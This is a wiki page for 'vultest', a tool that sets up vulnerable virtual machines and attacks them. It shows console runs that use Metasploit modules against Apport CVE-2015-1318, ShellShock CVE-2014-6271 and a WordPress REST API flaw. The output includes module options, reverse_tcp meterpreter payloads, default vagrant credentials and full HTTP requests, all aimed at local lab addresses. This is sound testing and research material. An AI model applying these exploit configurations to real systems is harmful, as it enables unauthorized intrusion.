-
Notifications
You must be signed in to change notification settings - Fork 2
Using vultest
redsloop edited this page Aug 6, 2020
·
41 revisions
There are two modes to execute: batch and interactive.
- username: vagrant
- password: vagrant
- IP address: 192.168.177.177
❯ ./vultest --CVE CVE-2015-1318 --dir /Users/redsloop/SimpleVulenv --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |CVE-2015-1318|
+--+-------------+
Select an id for testing vulnerability envrionment? CVE-2015-1318
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
[+] auxiliary/scanner/ssh/ssh_login
[+] exploit/linux/local/apport_abrt_chroot_priv_esc
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:3e:b7:7c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe3e:b77c
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:37:48:12
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe37:4812
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
● OS Name: ubuntu
● OS Version: 14.04.1
● Kernel Version: 3.13.0-32-generic
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe3e:b77c/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fe37:4812/64
Port
● 68/tcp(bootpc)
● 24409/tcp
● 56837/tcp
● 52777/tcp
● 5432/tcp(postgresql)
● 55553/tcp
● 22/tcp(ssh)
● 51619/tcp
Services
● acpid
● apparmor
● atd
● cron
● friendly-recovery
● postgresql
● resolvconf
● rsyslog
● udev
● vboxadd
● vboxadd-service
Attack Method
Metasploit
Module Name: auxiliary/scanner/ssh/ssh_login
● RHOSTS : 192.168.177.177
● USERNAME : vagrant
● PASSWORD : vagrant
Module Name: exploit/linux/local/apport_abrt_chroot_priv_esc
● SESSION : 1
● PAYLOAD : linux/x64/meterpreter/reverse_tcp
● LHOST : 192.168.177.177
Vulnerability
CVE Description
┃ The crash reporting feature in Apport 2.13 through 2.17.x before 2.17.1 allows local users to gain privileges
┃ via a crafted usr/share/apport/apport file in a namespace (container).
Affect Software Version(CPE)
● cpe:2.3:a:apport_project:apport:2.13:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.13.3:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.15:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.15.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16.1:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.16.2:*:*:*:*:*:*:*
● cpe:2.3:a:apport_project:apport:2.17:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/SimpleVulenv)
[+] Destroy the environment
❯ ./vultest --cve CVE-2014-6271 --dir $HOME/VultestEnv --attack_dir $HOME/VultestAttack --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+---------------------------------+
|id|vulenv name |
+--+---------------------------------+
|1 |ShellShock(meterpreter) |
|2 |ShellShock(shell) |
|3 |CVE-2014-6271(yum install httpd) |
|4 |CVE-2014-6271(yum install latest)|
+--+---------------------------------+
Select an id for testing vulnerability envrionment? CVE-2014-6271(yum install latest)
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
[+] Reload
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
[+] Startup
If you start the attack, puress ENTER key
[*] Exploit attack
[+] exploit/multi/http/apache_mod_cgi_bash_env_exec
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:10:fe:e8
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe10:fee8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:77:a2:3c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe77:a23c
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 6.5
● Kernel Version: 2.6.32-431.el6.x86_64
Related Software
● gcc : 4.4.7-23.el6
● make : 1:3.81-23.el6
● pcre : 7.8-6.el6
● wget : 1.12-10.el6
● httpd : 2.2.15-69.el6.centos
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe10:fee8/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fe77:a23c/64
Port
● 59018/udp
● 68/udp(bootpc)
● 80/tcp(http)
● 22/tcp(ssh)
● 25/tcp(smtp)
Services
● auditd
● crond
● master
● rsyslogd
● openssh-daemon
Attack Method
Metasploit
Module Name: exploit/multi/http/apache_mod_cgi_bash_env_exec
● RHOST : 192.168.177.177
● TARGETURI : http://192.168.177.177/cgi-bin/test.cgi
● PAYLOAD : linux/x86/meterpreter/reverse_tcp
Vulnerability
CVE Description
┃ GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment
┃ variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated
┃ by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the
┃ Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting
┃ the environment occurs across a privilege boundary from Bash execution, aka
┃ “ShellShock.” NOTE: the original
┃ fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is
┃ still present after the incorrect fix.
Affect Software Version(CPE)
● cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/VultestEnv)
[+] Destroy the environment
❯ ./vultest --cve CVE-2017-5487 --dir $HOME/VultestEnv --destroy yes
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
++++++++++++++++++++ Vulenv Part ++++++++++++++++++++
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |Wordpress 4.7|
+--+-------------+
Select an id for testing vulnerability envrionment? Wordpress 4.7
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
++++++++++++++++++++ Attack Part ++++++++++++++++++++
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
Result: Cannot Make a Decision(See Report)
++++++++++++++++++++ Report Part ++++++++++++++++++++
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 7.5
● Kernel Version: 3.10.0-862.el7.x86_64
Related Software
● gcc : 4.8.5-39.el7
● apr : 1.7.0
● expat-devel : 2.1.0-11.el7
● apr-util : 1.6.1
● gcc-c++ : 4.8.5-39.el7
● perl : 4:5.16.3-294.el7_6
● pcre : 8.39
● httpd : 2.4.43
● mysql : 5.7.15
● libxml2-devel : 2.9.1-6.el7.4
● libpng-devel : 2:1.5.13-7.el7_2
● unzip : 6.0-21.el7
● php : 7.1.0
● wp-cli : 0.24.1
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: enp0s3
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe03:8672/64
Interface: enp0s8
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:feda:ee0/64
Port
● 323/udp
● 50122/udp
● 68/udp(bootpc)
● 22/tcp(ssh)
● 60672/tcp
● 60678/tcp
● 3306/tcp(mysql)
● 80/tcp(http)
Attack Method
HTTP
Target URL
http://192.168.177.177/wordpress/index.php/hello-world/
HTTP Details
Attack URL
http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/?id=1AAA
HTTP Method
post
Request
Header
accept-encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
accept: /, application/json
user-agent: Ruby
content-type: application/x-www-form-urlencoded
connection: close
host: 192.168.177.177
content-length: 79
Body
title=Hello+World+CVE-2017-5487&content=Vulnrerability+in+Wordpress+version+4.1
Response
Header
date: Thu, 06 Aug 2020 14:00:51 GMT
server: Apache/2.4.43 (Unix) PHP/7.1.0
x-powered-by: PHP/7.1.0
x-robots-tag: noindex
link: http://192.168.177.177/wordpress/index.php/wp-json/; rel=”https://api.w.org/”
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: POST, PUT, PATCH, DELETE
content-length: 2007
connection: close
content-type: application/json; charset=UTF-8
Body(JSON)
{
“id”: 1,
“date”: “2020-08-06T13:59:58”,
“date_gmt”: “2020-08-06T13:59:58”,
“guid”: {
“rendered”: “http://192.168.177.177/wordpress/?p=1”,
“raw”: “http://192.168.177.177/wordpress/?p=1”
},
“modified”: “2020-08-06T14:00:51”,
“modified_gmt”: “2020-08-06T14:00:51”,
“password”: “”,
“slug”: “hello-world”,
“status”: “publish”,
“type”: “post”,
“link”: “http://192.168.177.177/wordpress/index.php/2020/08/06/hello-world/”,
“title”: {
“raw”: “Hello World CVE-2017-5487”,
“rendered”: “Hello World CVE-2017-5487”
},
“content”: {
“raw”: “Vulnrerability in Wordpress version 4.1”,
“rendered”: “<p>Vulnrerability in WordPress version 4.1</p>\n”,
“protected”: false
},
“excerpt”: {
“raw”: “”,
“rendered”: “<p>Vulnrerability in WordPress version 4.1</p>\n”,
“protected”: false
},
“author”: 1,
“featured_media”: 0,
“comment_status”: “open”,
“ping_status”: “open”,
“sticky”: false,
“template”: “”,
“format”: “standard”,
“meta”: [
],
“categories”: [
1
],
“tags”: [
],
“_links”: {
“self”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1”
}
],
“collection”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts”
}
],
“about”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/types/post”
}
],
“author”: [
{
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/users/1”
}
],
“replies”: [
{
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/comments?post=1”
}
],
“version-history”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/revisions”
}
],
“wp:attachment”: [
{
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/media?parent=1”
}
],
“wp:term”: [
{
“taxonomy”: “category”,
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/categories?post=1”
},
{
“taxonomy”: “post_tag”,
“embeddable”: true,
“href”: “http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/tags?post=1”
}
],
“curies”: [
{
“name”: “wp”,
“href”: “https://api.w.org/{rel}”,
“templated”: true
}
]
}
}
Vulnerability
CVE Description
┃ wp-includes/rest-api/endpoints/class-wp-rest-users-controller.php in the REST API implementation in WordPress
┃ 4.7 before 4.7.1 does not properly restrict listings of post authors, which allows remote attackers to
┃ obtain sensitive information via a wp-json/wp/v2/users request.
Affect Software Version(CPE)
● cpe:2.3:a:wordpress:wordpress:*:*:*:*:*:*:*:*
++++++++++++++++++++ Destroy Part ++++++++++++++++++++
Please select the environment you want to delete vulenv
[*] Destroy test_dir(/Users/redsloop/VultestEnv)
[+] Destroy the environment
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest >
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest > set TESTDIR $HOME/ShellShockVulenv
[*] testdir => $HOME/ShellShockVulenv
vultest > set ATTACKDIR $HOME/AttackEnv
[*] attackdir => $HOME/AttackEnv
vultest > test CVE-2014-6271
Vulnerability environment list
+--+---------------------------------+
|id|vulenv name |
+--+---------------------------------+
|1 |ShellShock(meterpreter) |
|2 |ShellShock(shell) |
|3 |CVE-2014-6271(yum install httpd) |
|4 |CVE-2014-6271(yum install latest)|
+--+---------------------------------+
Select an id for testing vulnerability envrionment? CVE-2014-6271(yum install httpd)
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
[+] Reload
CVE-2014-6271 > exploit
Create an attack machine? Yes
[*] ATTACKHOST => 192.168.77.77
[*] ATTACKUSER => vagrant
[*] ATTACKPASSWD => vagrant
[*] Prepare for an attack envionment
[+] Startup
If you start the attack, puress ENTER key
[*] Exploit attack
[+] exploit/multi/http/apache_mod_cgi_bash_env_exec
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 16436
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:10:fe:e8
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe10:fee8
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:cd:60:8d
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fecd:608d
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
❯ ./vultest
__ __ __ __ __ ______ ____ ____ ______
/\ \/\ \ /\ \/\ \ /\ \ /\__ _\ /\ _`\ /\ _`\ /\__ _\
\ \ \ \ \ \ \ \ \ \ \ \ \ \/_/\ \/ \ \ \_\_\ \ \,\_\_\ \/_/\ \/
\ \ \ \ \ \ \ \ \ \ \ \ \ __ \ \ \ \ \ _\_ \/_\__ \ \ \ \
\ \ \_/ \ \ \ \_\ \ \ \ \_\ \ \ \ \ \ \ \_\ \ /\ \_\ \ \ \ \
\ `\___/ \ \_____\ \ \____/ \ \_\ \ \____/ \ `\____\ \ \_\
`\/__/ \/_____/ \/___/ \/_/ \/___/ \/_____/ \/_/
vultest > set TESTDIR $HOME/LocalVulenv
[*] testdir => $HOME/LocalVulenv
vultest > test CVE-2015-1318
Vulnerability environment list
+--+-------------+
|id|vulenv name |
+--+-------------+
|1 |CVE-2015-1318|
+--+-------------+
Select an id for testing vulnerability envrionment? CVE-2015-1318
Do you select a vagrant image in local? no
Do you select a vagrant image in Vagrant Cloud? no
[+] Startup
CVE-2015-1318 > exploit
[*] ATTACKHOST => 192.168.177.177
[*] Prepare for an attack envionment
If you start the attack, puress ENTER key
[*] Exploit attack
[+] auxiliary/scanner/ssh/ssh_login
[+] exploit/linux/local/apport_abrt_chroot_priv_esc
Result: Attack Succeed(See Report)
[*] Brake into target machine
meterpreter > ifconfig
Interface 1
============
Name : lo
Hardware MAC : 00:00:00:00:00:00
MTU : 65536
Flags : UP,LOOPBACK
IPv4 Address : 127.0.0.1
IPv4 Netmask : 255.0.0.0
IPv6 Address : ::1
IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::
Interface 2
============
Name : eth0
Hardware MAC : 08:00:27:3e:b7:7c
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 10.0.2.15
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe3e:b77c
IPv6 Netmask : ffff:ffff:ffff:ffff::
Interface 3
============
Name : eth1
Hardware MAC : 08:00:27:38:68:cb
MTU : 1500
Flags : UP,BROADCAST,MULTICAST
IPv4 Address : 192.168.177.177
IPv4 Netmask : 255.255.255.0
IPv6 Address : fe80::a00:27ff:fe38:68cb
IPv6 Netmask : ffff:ffff:ffff:ffff::
meterpreter > exit
CVE-2014-6271 > report
Vultest Report
Target Host
Vulnerable Software
● bash : 4.3.20
Operating System
● Name: centos
● Version: 6.5
● Kernel Version: 2.6.32-431.el6.x86_64
Related Software
● gcc : 4.4.7-23.el6
● make : 3.81-23.el6
● pcre : 7.8-6.el6
● wget : 1.12-10.el6
● apache-httpd : 2.2.15
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: eth0
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe10:fee8/64
Interface: eth1
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:fea1:ea48/64
Port
● 68/udp(bootpc)
● 80/tcp(http)
● 22/tcp(ssh)
● 25/tcp(smtp)
Services
● auditd
● crond
● master
● rsyslogd
● openssh-daemon
Attack Method
Module Name : exploit/multi/http/apache_mod_cgi_bash_env_exec
● RHOST : 192.168.177.177
● TARGETURI : http://192.168.177.177/cgi-bin/test.cgi
● PAYLOAD : linux/x86/meterpreter/reverse_tcp
Vulnerability
CVE Description
┃ GNU Bash through 4.3 processes trailing strings after function definitions in the values of environment
┃ variables, which allows remote attackers to execute arbitrary code via a crafted environment, as demonstrated
┃ by vectors involving the ForceCommand feature in OpenSSH sshd, the mod_cgi and mod_cgid modules in the
┃ Apache HTTP Server, scripts executed by unspecified DHCP clients, and other situations in which setting
┃ the environment occurs across a privilege boundary from Bash execution, aka
┃ “ShellShock.” NOTE: the original
┃ fix for this issue was incorrect; CVE-2014-7169 has been assigned to cover the vulnerability that is
┃ still present after the incorrect fix.
Affect Software Version (CPE)
● cpe:2.3:a:gnu:bash:1.14.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.3:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.4:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.5:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.6:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:1.14.7:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.01.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.02.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.03:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.04:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:a:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:2.05:b:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.0.16:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:3.2.48:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.0:rc1:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.1:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.2:*:*:*:*:*:*:*
● cpe:2.3:a:gnu:bash:4.3:*:*:*:*:*:*:*
CVE-2017-5487 > report
Vultest Report
Vulnerable Environment
Vulnerable Software
Operating System
● Name: centos
● Version: 7.5
● Kernel Version: 3.10.0-862.el7.x86_64
Related Software
● gcc : 4.8.5-39.el7
● apr : 1.7.0
● expat-devel : 2.1.0-11.el7
● apr-util : 1.6.1
● gcc-c++ : 4.8.5-39.el7
● perl : 4:5.16.3-294.el7_6
● pcre : 8.39
● httpd : 2.4.43
● mysql : 5.7.15
● libxml2-devel : 2.9.1-6.el7.4
● libpng-devel : 2:1.5.13-7.el7_2
● unzip : 6.0-21.el7
● php : 7.1.0
● wp-cli : 0.24.1
IP Infomation
Interface: lo
● IPv4: 127.0.0.1/8
● IPv6: ::1/128
Interface: enp0s3
● IPv4: 10.0.2.15/24
● IPv6: fe80::a00:27ff:fe03:8672/64
Interface: enp0s8
● IPv4: 192.168.177.177/24
● IPv6: fe80::a00:27ff:feda:ee0/64
Port
● 323/udp
● 50122/udp
● 68/udp(bootpc)
● 22/tcp(ssh)
● 60672/tcp
● 60678/tcp
● 3306/tcp(mysql)
● 80/tcp(http)
Attack Method
HTTP
Target URL
http://192.168.177.177/wordpress/index.php/hello-world/
HTTP Details
Attack URL
http://192.168.177.177/wordpress/index.php/wp-json/wp/v2/posts/1/?id=1AAA
HTTP Method
post
Request
Header
accept-encoding: gzip;q=1.0,deflate;q=0.6,identity;q=0.3
accept: /, application/json
user-agent: Ruby
content-type: application/x-www-form-urlencoded
connection: close
host: 192.168.177.177
content-length: 79
Body
title=Hello+World+CVE-2017-5487&content=Vulnrerability+in+Wordpress+version+4.1
Response
Header
date: Thu, 06 Aug 2020 14:00:51 GMT
server: Apache/2.4.43 (Unix) PHP/7.1.0
x-powered-by: PHP/7.1.0
x-robots-tag: noindex
link: http://192.168.177.177/wordpress/index.php/wp-json/; rel=”https://api.w.org/”
x-content-type-options: nosniff
access-control-expose-headers: X-WP-Total, X-WP-TotalPages
access-control-allow-headers: Authorization, Content-Type
allow: POST, PUT, PATCH, DELETE
content-length: 2007
connection: close
content-type: application/json; charset=UTF-8
Body(JSON)
{
“id”: 1,
“date”: “2020-08-06T13:59:58”,
“date_gmt”: “2020-08-06T13:59:58”,
“guid”: {
“rendered”: “http://192.168.177.177/wordpress/?p=1”,
“raw”: “http://192.168.177.177/wordpress/?p=1”
},
“modified”: “2020-08-06T14:00:51”,
“modified_gmt”: “2020-08-06T14:00:51”,
“password”: “”,
“slug”: “hello-world”,
“status”: “publish”,
“type”: “post”,
